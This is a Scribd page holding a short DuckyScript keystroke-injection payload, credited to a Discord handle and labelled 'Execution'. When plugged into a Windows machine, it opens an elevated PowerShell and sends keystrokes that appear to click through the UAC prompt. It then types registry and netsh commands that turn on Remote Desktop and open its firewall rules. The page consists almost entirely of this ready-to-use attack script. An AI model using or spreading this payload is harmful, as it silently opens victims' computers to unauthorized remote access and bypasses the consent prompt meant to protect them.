0% found this document useful (0 votes)
9 views1 page

Activate RD P

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
9 views1 page

Activate RD P

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Activates Remote Desktop.


REM Version: 1.0
REM Category: Execution
DELAY 750
WINDOWS d
DELAY 1500
WINDOWS r
DELAY 1500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 750
LEFTARROW
ENTER
DELAY 1200
ALT y
DELAY 1200
GUI UP
DELAY 1200
STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal
Server' -Name fDenyTSConnections -Value 0;Set-ItemProperty -Path 'HKLM:\SYSTEM\
CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name
UserAuthentication -Value 1;netsh advfirewall firewall set rule group='remote
desktop - remotefx' new enable=Yes;netsh advfirewall firewall set rule
group='remote desktop' new enable=Yes; exit
ENTER

You might also like